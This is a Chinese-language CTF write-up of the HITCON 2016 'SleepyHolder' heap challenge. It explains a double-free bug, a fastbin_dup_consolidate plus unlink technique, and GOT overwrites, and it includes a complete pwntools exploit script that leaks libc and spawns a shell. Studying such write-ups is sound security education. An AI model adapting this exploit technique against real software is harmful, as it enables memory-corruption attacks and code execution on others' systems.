Hitcon 2016 SleepyHolder-fastbin_dup_consolidate.c

参考/题目下载：
https://github.com/mehQQ/public_writeup/tree/master/hitcon2016/SleepyHolder
https://blog.csdn.net/seaaseesa/article/details/105856878

1，三联
保护:基本都开了
功能：
0、唤醒功能；
1、创建-secret：
Small secret；
Big secret；
2、清除-secret；
3、修改-secret；

2,IDA分析功能
主函数：
清除功能-free：

这四个指针都是BSS段的地址。
问题点：
未检查free的指针是否为空；
free后指针未至置为0；
导致：可以double free
而要想成功double free，仅一个fastbin的chunk不行。Fastbin对double free的检查机制是仅仅检查fastbin的头chunk是否与当前要释放的这个相同size的chunk地址一样。

修改功能：

if检查了指针；
导致：无法UAF

创建功能：
可以创建3种规格，使用1和3规格，分别是创建fastchunk和largechunk（为了使fastchunk_bin到unsortbin中）。
扩展：创建2规格也行，就不用创建2个1规格的，因为astbin不能与top chunk相邻，否则直接它们合并。

思路

目前根据IDA分析出的条件：
double free;
bss段全局指针；

由于没有开启PIE，并且堆指针存储在bss上，因此unlink是比较好的方法。unlink利用需要如下条件：
全局指针；
溢出-伪造chunk(目前分析出的条件无此项);

解决伪造chunk问题：
利用malloc_consolidate，来将fastbin的chunk从fastbin里卸下来，触发malloc_consolidate的条件是申请一个大的堆，功能里正好有这个功能。malloc_consolidate的功能就是把chunk从fastbin取出，相邻的chunk进行合并，并且会设置下一个chunk的prev_inuse位为0。当chunk从fastbin里取出后，我们就可以在再一次free这个chunk了，此时，fastbin里没有形成循环链表，一个chunk在fastbin，一个chunk在unosrted bin。关键的一点是下一个chunk的prev_inuse已经清零，我们将fastbin里的那个chunk申请回来，伪造一个chunk，然后释放下一个unsorted bin范围的chunk，就会发生unlink。

Unlink以后，实现了任意地址读写，改写got表。

payload

bss段指针：
buf = 0x6020D0

#!/usr/bin/env python
from pwn import *
context.log_level="debug"

r = process("./SleepyHolder")
elf = ELF('./SleepyHolder')
def add(t, s):
    r.recvuntil('3. Renew secret\n')
    r.sendline('1')
    r.recvuntil('Big secret\n')
    r.sendline(str(t))
    r.recvuntil(': \n')
    r.send(s)

def de(t):
    r.recvuntil('3. Renew secret\n')
    r.sendline('2')
    r.recvuntil('Big secret\n')
    r.sendline(str(t))

def update(t, s):
    r.recvuntil('3. Renew secret\n')
    r.sendline('3')
    r.recvuntil('Big secret\n')
    r.sendline(str(t))
    r.recvuntil(': \n')
    r.send(s)

def debug():
    gdb.attach(r)
    pause()

add(1, 'a')	#chunk1_fastbin_chunk
add(2, 'a')	#chunk2_largin_chunk-avoid (fastbin_chunk + top_chunk) conlidate
#debug()	#break1
de(1)
add(3, 'a')	#chunk3_larbin_chunk-bypass double free check
#debug()	#break3
de(1)	# double free
#debug()		#break2

f_ptr = 0x6020d0	# global buf_ptr
fake_chunk = p64(0) + p64(0x21)
fake_chunk += p64(f_ptr - 0x18) + p64(f_ptr-0x10)
fake_chunk += '\x20'
add(1, fake_chunk)	#chunk1
#debug()	#break4
de(2)			#unlink
#debug()	#break5

atoi_GOT = 0x602080
free_GOT = 0x602018
puts_GOT = 0x602020
puts_plt = 0x400760
atoi_offset = 0x36e70
system_offset = 0x45380

f = p64(0)	#again global buf_ptr
f += p64(atoi_GOT) + p64(puts_GOT) + p64(free_GOT)
f += p32(1)*3
update(1, f)
#debug()		#break6
update(1, p64(puts_plt)) #change puts_got - > puts_plt
debug()	#break7
de(2)		
s = r.recv(6)
libc_base = u64(s.ljust(8, '\x00')) - atoi_offset	#leak libc_base
system = libc_base + system_offset
update(1, p64(system))
#debug()
add(2, 'sh\0')
de(2)	#get_shell


r.interactive()

调试

• break2
  绕过利用consolidation形成double free

对比验证：
fastbin与top_chunk合并了
-break4

注意：consolidation形成的double free,malloc一次就free bin中的都取出来了。

• break5

- break6

-break7

利用已修改的put_plt泄露libc_base，然后getshell。